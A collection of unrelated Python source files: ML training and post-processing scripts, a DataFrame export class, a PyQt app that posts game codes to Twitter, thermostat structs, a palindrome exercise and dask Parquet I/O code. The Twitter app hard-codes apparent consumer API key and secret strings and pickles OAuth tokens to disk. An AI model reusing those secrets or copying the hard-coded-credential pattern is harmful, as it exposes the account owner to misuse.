postprocess_dir = Path(__file__).parent
terms_file = postprocess_dir / "resources" / "terms.pkl"
terms_df = pd.read_pickle(str(terms_file))
return DeepGoPostProcess(terms_df)
POSTPROCESS = {
MODEL_DEEPGO: get_deepgo_postproces(),
MODEL_PROTBERT: get_deepgo_postproces(),
# etc.
}
def get_postprocess(model_name: str) -> PostProcess:
if model_name in POSTPROCESS:
logger.info(f'Loading post-process {POSTPROCESS[model_name]}')
return POSTPROCESS[model_name]
else:
logger.warning(f'No model name {model_name} - default post-processor loaded')
return PostProcess()
|
# -*- coding: utf-8 -*-
import logging
import os
import pickle
from pathlib import Path
from dotenv import find_dotenv, load_dotenv
from src.models.train_model import (
train_k_and_radius,
train_knn_grouping,
train_and_save_catboost_ensemble,
)
random_state = 123
def main():
""" Train best 3 models found in notebooks with both training data and
combined training and validation data. Saves pickled models to ./models
"""
logger = logging.getLogger(__name__)
logger.info("Training best models")
logger.info("training k and radius model with training data")
k_and_radius_model = train_k_and_radius(
train_data_path=os.path.join("data", "processed", "train.csv"),
metric="manhattan",
weights="uniform",
n_neighbors=3,
radius=2,
)
pickle.dump(
k_and_radius_model, open(os.path.join("models", "k_and_radius_model.p"), "wb")
)
logger.info("training knn grouping model (can only use training data)")
knn_grouping_model = train_knn_grouping(
train_data_path=os.path.join("data", "processed", "train.csv"),
metric="euclidean",
n_neighbors=2,
weights="squared_distance",
)
pickle.dump(
knn_grouping_model, open(os.path.join("models", "knn_grouping_model.p"), "wb")
)
logger.info("training catboost ensemble model")
knn_grouping_model = train_and_save_catboost_ensemble(
train_data_path=os.path.join("data", "processed", "train.csv"),
model_save_path=os.path.join("models", "catboost_ensemble_model_dict.p"),
random_state=random_state,
)
if __name__ == "__main__":
log_fmt = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
logging.basicConfig(level=logging.INFO, format=log_fmt)
# not used in this stub but often useful for finding various files
project_dir = Path(__file__).resolve().parents[2]
# find .env automagically by walking up directories until it's found, then
# load up the .env entries as environment variables
load_dotenv(find_dotenv())
main()
|
'''
objects to hold experiments
'''
import tkinter as tk
import pandas as pd
from tkinter import filedialog
import time, datetime
import os
Tk = tk.Tk()
Tk.withdraw()
class experiment:
def __init__(self, data: pd.DataFrame, params: pd.DataFrame, opt=None):
'''
:param data: Dataframe holding main data
:param params: Dataframe holding parameters
:param opt: Iterable of Dataframes holding optional data
Initializes the experiment object
'''
self.data = data
self.data.name = 'data'
self.params = params
self.params.name = 'params'
self.opt = opt
def data(self):
return self.data
def params(self):
return self.params
def opt(self):
return self.opt
def to_excel(self, filepath: str = None):
"""
:param filepath: String of .xlsx file name.
:return: No return statements
Save experiment object to a single .xlsx file.
WARNING: There are size and read/write speed limitations inherent to .xlsx.
"""
if filepath is None:
filepath = filedialog.asksaveasfile(mode='wb', filetypes=[('Excel Worksheet', '.xlsx')],
defaultextension='.xlsx')
with filepath as f:
filepath = f.name
else:
filepath = filepath
if filepath[-5:] != '.xlsx':
filepath = str(filepath + '.xlsx')
with pd.ExcelWriter(filepath) as writer:
self.data.to_excel(writer, engine='openpyxl', sheet_name='data')
self.params.to_excel(writer, engine='openpyxl', sheet_name='params')
if self.opt is not None:
for i in range(len(self.opt)):
self.opt[i].to_excel(writer, engine='openpyxl', sheet_name='opt'+str(i))
def to_csv(self, parentdir: str = None, dirname: str = None):
"""
:param parentdir: Parent directory to which to save directory of CSVs.
:param dirname: Name of directory of CSVs.
:return: No return statements
Creates a new directory in the selected directory
"""
if parentdir is None:
parentdir = filedialog.askdirectory(title='Select the Parent Directory')
if dirname is None:
ts = time.time()
dirname = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
os.mkdir(parentdir + '/' + dirname)
self.data.to_csv(parentdir + '/' + dirname + '/data.csv')
self.params.to_csv(parentdir + '/' + dirname + '/params.csv')
if self.opt is not None:
for i in range(len(self.opt)):
self.opt[i].to_csv(parentdir + '/' + dirname + '/opt' + str(i) + '.csv')
|
#!python3.5
import sys
from os import getenv, path
from PyQt5 import QtWidgets, QtGui
import webbrowser
import urllib.parse as parseurl
import six.moves
# import httplib2
# import urllib3
import pyperclip
import pickle
#import oauth2
import tweepy
#import twitter
# Custom Packages
import GlyphGrabber
# UI Import
from design import Ui_MainWindow
from dialog import Ui_Dialog
from confirm import Ui_Dialog as Ui_Dialog2
sys.path.insert(0, 'pkgs')
# SCRIPTS
class Window(Ui_MainWindow):
def __init__(self, dialog):
Ui_MainWindow.__init__(self)
self.setupUi(dialog)
scriptDir = path.dirname(path.realpath('__file__'))
dialog.setWindowIcon(QtGui.QIcon(scriptDir + path.sep + 'images/gcg.png'))
self.status.setText('Welcome to your all in one Glyph Manager!')
self.init_dict = {0: '', 1: '', 2: '', 'oauth_token': '', 'oauth_token_secret': ''}
# NORMAL FUNCTIONS
# Twitter blanks
self.access_token = {'oauth_token': '', 'oauth_token_secret': ''}
self.twee = tweepy.API()
self.api = tweepy.api
try:
with open('bin/config.init', 'rb') as inConfig:
self.init_dict = pickle.load(inConfig)
if self.init_dict is not None:
try:
self.pcPath = self.init_dict[0]
self.psPath = self.init_dict[1]
self.xbPath = self.init_dict[2]
self.access_token['oauth_token'] = self.access_token['oauth_token']
self.access_token['oauth_token_secret'] = self.access_token['oauth_token_secret']
except IndexError:
print('A line was not found')
except FileNotFoundError:
print('No Config File! Creating one now...')
self.config()
self.ggpc = GlyphGrabber.GlyphGrabber(self.pcPath)
self.ggps4 = GlyphGrabber.GlyphGrabber(self.psPath)
self.ggxb1 = GlyphGrabber.GlyphGrabber(self.xbPath)
self.read_config_data()
# FOR TWITTER
if self.init_dict['oauth_token'] is '':
self.actionTwitter.setEnabled(True)
self.twitter_post.setEnabled(False)
else:
self.twitter_connect()
self.init_ui()
def init_ui(self):
self.inputPC.setText(self.pcPath)
self.inputPS4.setText(self.psPath)
self.inputXB1.setText(self.xbPath)
# Widget Function Linking
self.buttonPC.clicked.connect(self.pc_bbutton)
self.buttonPS4.clicked.connect(self.ps4_bbutton)
self.buttonXB1.clicked.connect(self.xb1_bbutton)
self.button1.clicked.connect(self.pc_gbutton)
self.button2.clicked.connect(self.ps4_gbutton)
self.button3.clicked.connect(self.xb1_gbutton)
# Other Things
self.num_codes.valueChanged.connect(self.slider_change)
# Menu Actions
self.actionDocumentation.triggered.connect(self.documentation)
self.actionTwitter.triggered.connect(self.twitter_connect)
self.actionReset.triggered.connect(self.reconfig)
# Twitter portion
self.twitter_post.clicked.connect(self.twitter_giveaway)
def twitter_giveaway(self):
tweet = ""
confirm = self.confirm_send()
code_length = 19
num_codes = 0
labels = 0
if self.post_pc.isChecked():
num_codes = num_codes+1
labels = labels+3
if self.post_ps4.isChecked():
num_codes = num_codes + 1
labels = labels + 4
if self.post_xb1.isChecked():
num_codes = num_codes + 1
labels = labels + 4
can_you_post = labels + num_codes*(code_length*self.num_codes.value())
if can_you_post < 280:
if confirm is True:
try:
if self.post_pc.isChecked():
tweet = tweet + '\nPC:' + self.ggpc.get_codes2(self.num_codes.value())
if self.post_ps4.isChecked():
tweet = tweet + '\nPS4:' + self.ggpc.get_codes2(self.num_codes.value())
if self.post_xb1.isChecked():
tweet = tweet + '\nXB1:' + self.ggpc.get_codes2(self.num_codes.value())
if len(tweet) <= 280:
print(tweet)
self.api.update_status(status=tweet)
self.status.setText('Posted to Twitter!')
else:
print('Your pending tweet is over 280 characters')
except tweepy.TweepError:
print('You aren\'t posting anything...')
except TypeError:
print('Bad format. Please make sure you have one glyph code per line!')
else:
print('Your pending tweet is over 280 characters')
def twitter_connect(self):
consumer_api = "0IxvGU3ZW5ui4WOOSns1aBCYf"
consumer_secret = "T2YUYViTBCUPWkmtVBLSvm15BTF6H4Pd9gvvr4PihSuJKV88Ub"
if self.init_dict['oauth_token'] is '':
self.oauth_req(consumer_api, consumer_secret)
try:
auth = tweepy.OAuthHandler(consumer_api, consumer_secret)
auth.set_access_token(self.access_token['oauth_token'],self.access_token['oauth_token_secret'])
self.api = tweepy.API(auth)
if self.init_dict['oauth_token'] is not '':
client_token = self.access_token['oauth_token']
client_secret = self.access_token['oauth_token_secret']
auth = tweepy.OAuthHandler(consumer_api, consumer_secret)
auth.set_access_token(client_token, client_secret)
self.twee = tweepy.API(auth)
# Connected to users twitter
self.init_dict['oauth_token'] = client_token
self.init_dict['oauth_token_secret'] = client_secret
self.config()
print('Connected to ' + self.api.me().name + '\'s Twitter account!')
self.actionTwitter.setEnabled(False)
self.twitter_post.setEnabled(True)
else:
print('issue retrieving OAuth')
except (KeyError, tweepy.TweepError):
print('Twitter Connection Failed.')
def oauth_req(self, consumer_api, consumer_secret, http_method="GET"):
# 1
print('1: Connecting to Consumer')
auth = tweepy.OAuthHandler(consumer_api, consumer_secret)
print('\tAbout to pull data.')
try:
redirect_url = auth.get_authorization_url() # ################# ISSUE HERE
print('\tpulled url.')
except tweepy.TweepError:
print('Error! Failed to oauth.')
# 2
print('2 Retrieving Client Info')
webbrowser.open(redirect_url, new=2) # ################# ISSUE HERE
verifier = self.doit()
# 3
print('3: Connecting to client\'s account')
if len(verifier) == 7:
try:
auth.get_access_token(verifier)
self.access_token['oauth_token'] = auth.access_token
self.access_token['oauth_token_secret'] = auth.access_token_secret
self.init_dict['oauth_token'] = auth.access_token
self.init_dict['oauth_token_secret'] = auth.access_token_secret
self.config()
except tweepy.TweepError:
print('Error! Failed to get access token.')
else:
print('Twitter connection failed.')
def doit(self):
print("Opening a new popup window...")
dialog = QtWidgets.QDialog()
self.pop = PopUpMessage(dialog, "What is the Confirmation code?")
self.pop.pushButton.clicked.connect(lambda: self.length_check_7(dialog))
dialog.exec_()
dialog.show()
dialog.close()
return self.pop.lineEdit.text()
def confirm_send(self):
print("Opening a new popup window...")
dialog = QtWidgets.QDialog()
self.pop = ConfirmMessage(dialog, "Are you sure you want to give away codes on Twitter?!?")
yes_button = QtWidgets.QDialogButtonBox.Yes
cancel_button = QtWidgets.QDialogButtonBox.Cancel
self.pop.buttonBox.button(yes_button).clicked.connect(lambda: self.conf(True, dialog, self.pop))
self.pop.buttonBox.button(cancel_button).clicked.connect(lambda: self.conf(False, dialog, self.pop))
dialog.exec_()
dialog.show()
dialog.close()
print(self.pop.getVALUE())
return self.pop.getVALUE()
def length_check_7(self, dialog):
if len(self.pop.lineEdit.text()) == 7:
dialog.accept()
dialog.close()
else:
print('Your code was not correct')
def conf(self, val, dialog, pop):
if val is True:
pop.setVALUE(True)
dialog.accept()
dialog.close()
elif val is False:
pop.setVALUE(False)
dialog.reject()
dialog.close()
def documentation(self):
webbrowser.open('https://tdefton.stream/gcg/documentation/', new=2)
def slider_change(self):
self.num_of_codes.setText(str(self.num_codes.value()))
def pc_gbutton(self):
self.ggpc.get_codes(self.num_codes.value())
self.code.setText(self.ggpc.label)
self.status.setText('PC code(s) copied to your clipboard.')
def ps4_gbutton(self):
self.ggps4.get_codes(self.num_codes.value())
self.code.setText(self.ggpc.label)
self.status.setText('PS4 code(s) copied to your clipboard.')
def xb1_gbutton(self):
self.ggxb1.get_codes(self.num_codes.value())
self.code.setText(self.ggpc.label)
self.status.setText('XB1 code(s) copied to your clipboard.')
def pc_bbutton(self):
pathpc = self.browse('PC Codes File...')
self.inputPC.setText(pathpc)
self.ggpc.filePath = pathpc
self.init_dict[0] = pathpc
self.config()
self.status.setText('PC code file path added!')
def ps4_bbutton(self):
pathps4 = self.browse('PS4 Codes File...')
self.inputPS4.setText(pathps4)
self.ggps4.filePath = pathps4
self.init_dict[1] = pathps4
self.config()
self.status.setText('PS4 code file path added!')
def xb1_bbutton(self):
pathxb1 = self.browse('XB1 Codes File...')
self.inputXB1.setText(pathxb1)
self.ggxb1.filePath = pathxb1
self.init_dict[2] = pathxb1
self.config()
self.status.setText('XB1 code file path added!')
# LOGIC
@staticmethod
def browse(searchFor):
filepath = QtWidgets.QFileDialog.getOpenFileName(None, searchFor, getenv('HOME'), '*.txt *.csv')
print(filepath[0])
return filepath[0]
def config(self):
# Init for the Config File
with open('bin/config.init', 'wb') as outConfig:
pickle.dump(self.init_dict, outConfig)
print('Config file updated.')
def read_config_data(self):
# Reads the data from the config file and sets it up accordingly
try:
self.ggpc.filePath = self.init_dict[0]
self.ggps4.filePath = self.init_dict[1]
self.ggxb1.filePath = self.init_dict[2]
self.access_token['oauth_token'] = self.init_dict['oauth_token']
self.access_token['oauth_token_secret'] = self.init_dict['oauth_token_secret']
print('Config data loaded.')
except KeyError:
self.config()
def reconfig(self):
self.actionTwitter.setEnabled(True)
self.twitter_post.setEnabled(False)
self.num_codes.setValue(1)
self.post_pc.setChecked(False)
self.post_ps4.setChecked(False)
self.post_xb1.setChecked(False)
self.code.setText('-')
self.init_dict = {0: '', 1: '', 2: '', 'oauth_token': '', 'oauth_token_secret': ''}
self.ggpc.filePath = ' '
self.ggps4.filePath = ' '
self.ggxb1.filePath = ' '
self.config()
self.status.setText('GCG wiped clean!')
class PopUpMessage(Ui_Dialog):
text = "-"
def __init__(self, dialog, text=None):
Ui_MainWindow.__init__(self)
self.setupUi(dialog)
self.text = text
self.init_ui()
dialog.setWindowTitle("GCG")
scriptDir = path.dirname(path.realpath('__file__'))
dialog.setWindowIcon(QtGui.QIcon(scriptDir + path.sep + 'images/gcg.png'))
def init_ui(self):
if self.text is not None:
self.label.setText(self.text)
class ConfirmMessage(Ui_Dialog2):
text = "-"
__val = None
def __init__(self, dialog, text=None):
Ui_MainWindow.__init__(self)
self.setupUi(dialog)
self.text = text
self.init_ui()
dialog.setWindowTitle("GCG")
scriptDir = path.dirname(path.realpath('__file__'))
dialog.setWindowIcon(QtGui.QIcon(scriptDir + path.sep + 'images/gcg.png'))
def init_ui(self):
if self.text is not None:
self.label.setText(self.text)
def getVALUE(self):
return self.__val
def setVALUE(self, value):
if value is True or value is False:
self.__val = value
def main():
app = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QMainWindow()
prog = Window(dialog)
dialog.show()
sys.exit(app.exec_())
__version__ = 1.2
if __name__ == '__main__':
main()
|
#!/usr/bin/python
"""
Author: Fabio Hellmann <info@fabio-hellmann.de>
"""
from attr import s, ib
from attr.validators import instance_of
from enum import Enum, unique
from datetime import datetime
@unique
class StructPacking(Enum):
PIN = '<I'
BATTERY = '<B'
DATETIME = '<BBBBB'
STATUS = '<BBB'
TEMPERATURES = '<bbbbbbb'
LCD_TIMER = '<BB'
DAY = '<BBBBBBBB'
HOLIDAY = '<BBBBBBBBb'
@s(frozen=True)
class Holiday(object):
start = ib(validator=instance_of(datetime), type=datetime)
end = ib(validator=instance_of(datetime), type=datetime)
temperature = ib(validator=instance_of(float), type=float)
def is_active(self):
return not(self.start is None) and not(self.end is None) and not(self.temperature is None)
@s(frozen=True)
class Day(object):
start = ib(validator=instance_of(datetime), type=datetime)
end = ib(validator=instance_of(datetime), type=datetime)
@s(frozen=True)
class Status(object):
state_as_dword = ib(validator=instance_of(str), type=str)
unused_bits = ib(validator=instance_of(int), type=int)
@s(frozen=True)
class Temperature(object):
current_temp = ib(validator=instance_of(float), type=float)
manual_temp = ib(validator=instance_of(float), type=float)
target_temp_l = ib(validator=instance_of(float), type=float)
target_temp_h = ib(validator=instance_of(float), type=float)
offset_temp = ib(validator=instance_of(float), type=float)
window_open_detection = ib(validator=instance_of(int), type=int)
window_open_minutes = ib(validator=instance_of(int), type=int) |
'''
Similar : https://leetcode.com/problems/minimum-insertion-steps-to-make-a-string-palindrome/
'''
class Day34(object):
def min_insertions(self, string):
"""
:type s: str
:rtype: int
"""
self.string = string
s_len = len(string)
dp = [[None for _ in range(s_len)] for _ in range(s_len)]
def helper(left, right, dp):
if dp[left][right]:
return dp[left][right]
sl = self.string[left]
sr = self.string[right]
if left == right:
res = (0, sl)
elif left == right - 1:
curr_string = self.string[left:right+1]
res = (0, curr_string) if sl == sr \
else (1, min(curr_string + sl, sr + curr_string))
else:
if sl == sr:
rec = helper(left + 1, right - 1, dp)
res = (rec[0], sl + rec[1] + sl)
else:
l_recur = helper(left + 1, right, dp)
r_recur = helper(left, right - 1, dp)
lsl = sl + l_recur[1] + sl
rsr = sr + r_recur[1] + sr
if l_recur[0] < r_recur[0] or (l_recur[0] == r_recur[0] and lsl <= rsr):
res = (l_recur[0] + 1, lsl)
elif l_recur[0] > r_recur[0] or (l_recur[0] == r_recur[0] and lsl > rsr):
res = (r_recur[0] + 1, rsr)
dp[left][right] = res
return res
return helper(0, s_len - 1, dp)[1]
if __name__ == '__main__':
day_34 = Day34()
assert day_34.min_insertions("zzazz") == "zzazz"
assert day_34.min_insertions("google") == "elgoogle"
assert day_34.min_insertions("race") == "ecarace"
assert day_34.min_insertions("google") == "elgoogle"
assert day_34.min_insertions("racecar") == "racecar"
assert day_34.min_insertions("google") == "elgoogle"
assert day_34.min_insertions("egoogle") == "elgoogle"
assert day_34.min_insertions("elgoog") == "elgoogle"
assert day_34.min_insertions("race") == "ecarace" |
import math
import warnings
import tlz as toolz
from fsspec.core import get_fs_token_paths
from fsspec.implementations.local import LocalFileSystem
from fsspec.utils import stringify_path
from ....base import tokenize
from ....delayed import Delayed
from ....highlevelgraph import HighLevelGraph
from ....layers import DataFrameIOLayer
from ....utils import apply, import_required, natural_sort_key, parse_bytes
from ...core import DataFrame, Scalar, new_dd_object
from ...methods import concat
from .utils import _sort_and_analyze_paths
try:
import snappy
snappy.compress
except (ImportError, AttributeError):
snappy = None
__all__ = ("read_parquet", "to_parquet")
NONE_LABEL = "__null_dask_index__"
# ----------------------------------------------------------------------
# User API
class ParquetFunctionWrapper:
"""
Parquet Function-Wrapper Class
Reads parquet data from disk to produce a partition
(given a `part` argument).
"""
def __init__(
self,
engine,
fs,
meta,
columns,
index,
kwargs,
common_kwargs,
):
self.engine = engine
self.fs = fs
self.meta = meta
self.columns = columns
self.index = index
# `kwargs` = user-defined kwargs to be passed
# identically for all partitions.
#
# `common_kwargs` = kwargs set by engine to be
# passed identically for all
# partitions.
self.common_kwargs = toolz.merge(common_kwargs, kwargs or {})
def project_columns(self, columns):
"""Return a new ParquetFunctionWrapper object with
a sub-column projection.
"""
if columns == self.columns:
return self
return ParquetFunctionWrapper(
self.engine,
self.fs,
self.meta,
columns,
self.index,
None, # Already merged into common_kwargs
self.common_kwargs,
)
def __call__(self, part):
if not isinstance(part, list):
part = [part]
return read_parquet_part(
self.fs,
self.engine,
self.meta,
[(p["piece"], p.get("kwargs", {})) for p in part],
self.columns,
self.index,
self.common_kwargs,
)
def read_parquet(
path,
columns=None,
filters=None,
categories=None,
index=None,
storage_options=None,
engine="auto",
gather_statistics=None,
split_row_groups=None,
read_from_paths=None,
chunksize=None,
aggregate_files=None,
**kwargs,
):
"""
Read a Parquet file into a Dask DataFrame
This reads a directory of Parquet data into a Dask.dataframe, one file per
partition. It selects the index among the sorted columns if any exist.
Parameters
----------
path : str or list
Source directory for data, or path(s) to individual parquet files.
Prefix with a protocol like ``s3://`` to read from alternative
filesystems. To read from multiple files you can pass a globstring or a
list of paths, with the caveat that they must all have the same
protocol.
columns : str or list, default None
Field name(s) to read in as columns in the output. By default all
non-index fields will be read (as determined by the pandas parquet
metadata, if present). Provide a single field name instead of a list to
read in the data as a Series.
filters : Union[List[Tuple[str, str, Any]], List[List[Tuple[str, str, Any]]]], default None
List of filters to apply, like ``[[('col1', '==', 0), ...], ...]``.
Using this argument will NOT result in row-wise filtering of the final
partitions unless ``engine="pyarrow-dataset"`` is also specified. For
other engines, filtering is only performed at the partition level, i.e.,
to prevent the loading of some row-groups and/or files.
For the "pyarrow" engines, predicates can be expressed in disjunctive
normal form (DNF). This means that the innermost tuple describes a single
column predicate. These inner predicates are combined with an AND
conjunction into a larger predicate. The outer-most list then combines all
of the combined filters with an OR disjunction.
Predicates can also be expressed as a List[Tuple]. These are evaluated
as an AND conjunction. To express OR in predictates, one must use the
(preferred for "pyarrow") List[List[Tuple]] notation.
Note that the "fastparquet" engine does not currently support DNF for
the filtering of partitioned columns (List[Tuple] is required).
index : str, list or False, default None
Field name(s) to use as the output frame index. By default will be
inferred from the pandas parquet file metadata (if present). Use False
to read all fields as columns.
categories : list or dict, default None
For any fields listed here, if the parquet encoding is Dictionary,
the column will be created with dtype category. Use only if it is
guaranteed that the column is encoded as dictionary in all row-groups.
If a list, assumes up to 2**16-1 labels; if a dict, specify the number
of labels expected; if None, will load categories automatically for
data written by dask/fastparquet, not otherwise.
storage_options : dict, default None
Key/value pairs to be passed on to the file-system backend, if any.
engine : str, default 'auto'
Parquet reader library to use. Options include: 'auto', 'fastparquet',
'pyarrow', 'pyarrow-dataset', and 'pyarrow-legacy'. Defaults to 'auto',
which selects the FastParquetEngine if fastparquet is installed (and
ArrowLegacyEngine otherwise). If 'pyarrow-dataset' is specified, the
ArrowDatasetEngine (which leverages the pyarrow.dataset API) will be used
for newer PyArrow versions (>=1.0.0). If 'pyarrow' or 'pyarrow-legacy' are
specified, the ArrowLegacyEngine will be used (which leverages the
pyarrow.parquet.ParquetDataset API).
NOTE: 'pyarrow-dataset' enables row-wise filtering, but requires
pyarrow>=1.0. The behavior of 'pyarrow' will most likely change to
ArrowDatasetEngine in a future release, and the 'pyarrow-legacy'
option will be deprecated once the ParquetDataset API is deprecated.
gather_statistics : bool, default None
Gather the statistics for each dataset partition. By default,
this will only be done if the _metadata file is available. Otherwise,
statistics will only be gathered if True, because the footer of
every file will be parsed (which is very slow on some systems).
split_row_groups : bool or int, default None
Default is True if a _metadata file is available or if
the dataset is composed of a single file (otherwise defult is False).
If True, then each output dataframe partition will correspond to a single
parquet-file row-group. If False, each partition will correspond to a
complete file. If a positive integer value is given, each dataframe
partition will correspond to that number of parquet row-groups (or fewer).
Only the "pyarrow" engine supports this argument.
read_from_paths : bool, default None
Only used by ``ArrowDatasetEngine`` when ``filters`` are specified.
Determines whether the engine should avoid inserting large pyarrow
(``ParquetFileFragment``) objects in the task graph. If this option
is True, ``read_partition`` will need to regenerate the appropriate
fragment object from the path and row-group IDs. This will reduce the
size of the task graph, but will add minor overhead to ``read_partition``.
By default (None), ``ArrowDatasetEngine`` will set this option to
``False`` when there are filters.
chunksize : int or str, default None
The desired size of each output ``DataFrame`` partition in terms of total
(uncompressed) parquet storage space. If specified, adjacent row-groups
and/or files will be aggregated into the same output partition until the
cumulative ``total_byte_size`` parquet-metadata statistic reaches this
value. Use `aggregate_files` to enable/disable inter-file aggregation.
aggregate_files : bool or str, default None
Whether distinct file paths may be aggregated into the same output
partition. This parameter requires `gather_statistics=True`, and is
only used when `chunksize` is specified or when `split_row_groups` is
an integer >1. A setting of True means that any two file paths may be
aggregated into the same output partition, while False means that
inter-file aggregation is prohibited.
For "hive-partitioned" datasets, a "partition"-column name can also be
specified. In this case, we allow the aggregation of any two files
sharing a file path up to, and including, the corresponding directory name.
For example, if ``aggregate_files`` is set to ``"section"`` for the
directory structure below, ``03.parquet`` and ``04.parquet`` may be
aggregated together, but ``01.parquet`` and ``02.parquet`` cannot be.
If, however, ``aggregate_files`` is set to ``"region"``, ``01.parquet``
may be aggregated with ``02.parquet``, and ``03.parquet`` may be aggregated
with ``04.parquet``::
dataset-path/
├── region=1/
│ ├── section=a/
│ │ └── 01.parquet
│ ├── section=b/
│ └── └── 02.parquet
└── region=2/
├── section=a/
│ ├── 03.parquet
└── └── 04.parquet
Note that the default behavior of ``aggregate_files`` is False.
**kwargs: dict (of dicts)
Passthrough key-word arguments for read backend.
The top-level keys correspond to the appropriate operation type, and
the second level corresponds to the kwargs that will be passed on to
the underlying ``pyarrow`` or ``fastparquet`` function.
Supported top-level keys: 'dataset' (for opening a ``pyarrow`` dataset),
'file' (for opening a ``fastparquet`` ``ParquetFile``), 'read' (for the
backend read function), 'arrow_to_pandas' (for controlling the arguments
passed to convert from a ``pyarrow.Table.to_pandas()``)
Examples
--------
>>> df = dd.read_parquet('s3://bucket/my-parquet-data') # doctest: +SKIP
See Also
--------
to_parquet
pyarrow.parquet.ParquetDataset
"""
if isinstance(columns, str):
df = read_parquet(
path,
columns=[columns],
filters=filters,
categories=categories,
index=index,
storage_options=storage_options,
engine=engine,
gather_statistics=gather_statistics,
split_row_groups=split_row_groups,
read_from_paths=read_from_paths,
chunksize=chunksize,
aggregate_files=aggregate_files,
)
return df[columns]
if columns is not None:
columns = list(columns)
label = "read-parquet-"
output_name = label + tokenize(
path,
columns,
filters,
categories,
index,
storage_options,
engine,
gather_statistics,
split_row_groups,
read_from_paths,
chunksize,
aggregate_files,
)
if isinstance(engine, str):
engine = get_engine(engine)
if hasattr(path, "name"):
path = stringify_path(path)
fs, _, paths = get_fs_token_paths(path, mode="rb", storage_options=storage_options)
paths = sorted(paths, key=natural_sort_key) # numeric rather than glob ordering
auto_index_allowed = False
if index is None:
# User is allowing auto-detected index
auto_index_allowed = True
if index and isinstance(index, str):
index = [index]
if chunksize or (
split_row_groups and int(split_row_groups) > 1 and aggregate_files
):
# Require `gather_statistics=True` if `chunksize` is used,
# or if `split_row_groups>1` and we are aggregating files.
if gather_statistics is False:
raise ValueError("read_parquet options require gather_statistics=True")
gather_statistics = True
read_metadata_result = engine.read_metadata(
fs,
paths,
categories=categories,
index=index,
gather_statistics=gather_statistics,
filters=filters,
split_row_groups=split_row_groups,
read_from_paths=read_from_paths,
chunksize=chunksize,
aggregate_files=aggregate_files,
**kwargs,
)
# In the future, we may want to give the engine the
# option to return a dedicated element for `common_kwargs`.
# However, to avoid breaking the API, we just embed this
# data in the first element of `parts` for now.
# The logic below is inteded to handle backward and forward
# compatibility with a user-defined engine.
meta, statistics, parts, index = read_metadata_result[:4]
common_kwargs = {}
aggregation_depth = False
if len(parts):
# For now, `common_kwargs` and `aggregation_depth`
# may be stored in the first element of `parts`
common_kwargs = parts[0].pop("common_kwargs", {})
aggregation_depth = parts[0].pop("aggregation_depth", aggregation_depth)
# Parse dataset statistics from metadata (if available)
parts, divisions, index, index_in_columns = process_statistics(
parts,
statistics,
filters,
index,
chunksize,
split_row_groups,
fs,
aggregation_depth,
)
# Account for index and columns arguments.
# Modify `meta` dataframe accordingly
meta, index, columns = set_index_columns(
meta, index, columns, index_in_columns, auto_index_allowed
)
if meta.index.name == NONE_LABEL:
meta.index.name = None
# Set the index that was previously treated as a column
if index_in_columns:
meta = meta.set_index(index)
if meta.index.name == NONE_LABEL:
meta.index.name = None
if len(divisions) < 2:
# empty dataframe - just use meta
graph = {(output_name, 0): meta}
divisions = (None, None)
else:
# Create Blockwise layer
layer = DataFrameIOLayer(
output_name,
columns,
parts,
ParquetFunctionWrapper(
engine,
fs,
meta,
columns,
index,
kwargs,
common_kwargs,
),
label=label,
)
graph = HighLevelGraph({output_name: layer}, {output_name: set()})
return new_dd_object(graph, output_name, meta, divisions)
def check_multi_support(engine):
# Helper function to check that the engine
# supports a multi-partition read
return hasattr(engine, "multi_support") and engine.multi_support()
def read_parquet_part(fs, engine, meta, part, columns, index, kwargs):
"""Read a part of a parquet dataset
This function is used by `read_parquet`."""
if isinstance(part, list):
if len(part) == 1 or part[0][1] or not check_multi_support(engine):
# Part kwargs expected
func = engine.read_partition
dfs = [
func(fs, rg, columns.copy(), index, **toolz.merge(kwargs, kw))
for (rg, kw) in part
]
df = concat(dfs, axis=0) if len(dfs) > 1 else dfs[0]
else:
# No part specific kwargs, let engine read
# list of parts at once
df = engine.read_partition(
fs, [p[0] for p in part], columns.copy(), index, **kwargs
)
else:
# NOTE: `kwargs` are the same for all parts, while `part_kwargs` may
# be different for each part.
rg, part_kwargs = part
df = engine.read_partition(
fs, rg, columns, index, **toolz.merge(kwargs, part_kwargs)
)
if meta.columns.name:
df.columns.name = meta.columns.name
columns = columns or []
index = index or []
df = df[[c for c in columns if c not in index]]
if index == [NONE_LABEL]:
df.index.name = None
return df
def to_parquet(
df,
path,
engine="auto",
compression="default",
write_index=True,
append=False,
overwrite=False,
ignore_divisions=False,
partition_on=None,
storage_options=None,
custom_metadata=None,
write_metadata_file=True,
compute=True,
compute_kwargs=None,
schema=None,
**kwargs,
):
"""Store Dask.dataframe to Parquet files
Notes
-----
Each partition will be written to a separate file.
Parameters
----------
df : dask.dataframe.DataFrame
path : string or pathlib.Path
Destination directory for data. Prepend with protocol like ``s3://``
or ``hdfs://`` for remote data.
engine : {'auto', 'fastparquet', 'pyarrow'}, default 'auto'
Parquet library to use. If only one library is installed, it will use
that one; if both, it will use 'fastparquet'.
compression : string or dict, default 'default'
Either a string like ``"snappy"`` or a dictionary mapping column names
to compressors like ``{"name": "gzip", "values": "snappy"}``. The
default is ``"default"``, which uses the default compression for
whichever engine is selected.
write_index : boolean, default True
Whether or not to write the index. Defaults to True.
append : bool, default False
If False (default), construct data-set from scratch. If True, add new
row-group(s) to an existing data-set. In the latter case, the data-set
must exist, and the schema must match the input data.
overwrite : bool, default False
Whether or not to remove the contents of `path` before writing the dataset.
The default is False. If True, the specified path must correspond to
a directory (but not the current working directory). This option cannot
be set to True if `append=True`.
NOTE: `overwrite=True` will remove the original data even if the current
write operation fails. Use at your own risk.
ignore_divisions : bool, default False
If False (default) raises error when previous divisions overlap with
the new appended divisions. Ignored if append=False.
partition_on : list, default None
Construct directory-based partitioning by splitting on these fields'
values. Each dask partition will result in one or more datafiles,
there will be no global groupby.
storage_options : dict, default None
Key/value pairs to be passed on to the file-system backend, if any.
custom_metadata : dict, default None
Custom key/value metadata to include in all footer metadata (and
in the global "_metadata" file, if applicable). Note that the custom
metadata may not contain the reserved b"pandas" key.
write_metadata_file : bool, default True
Whether to write the special "_metadata" file.
compute : bool, default True
If :obj:`True` (default) then the result is computed immediately. If :obj:`False`
then a ``dask.dataframe.Scalar`` object is returned for future computation.
compute_kwargs : dict, default True
Options to be passed in to the compute method
schema : Schema object, dict, or {"infer", None}, default None
Global schema to use for the output dataset. Alternatively, a `dict`
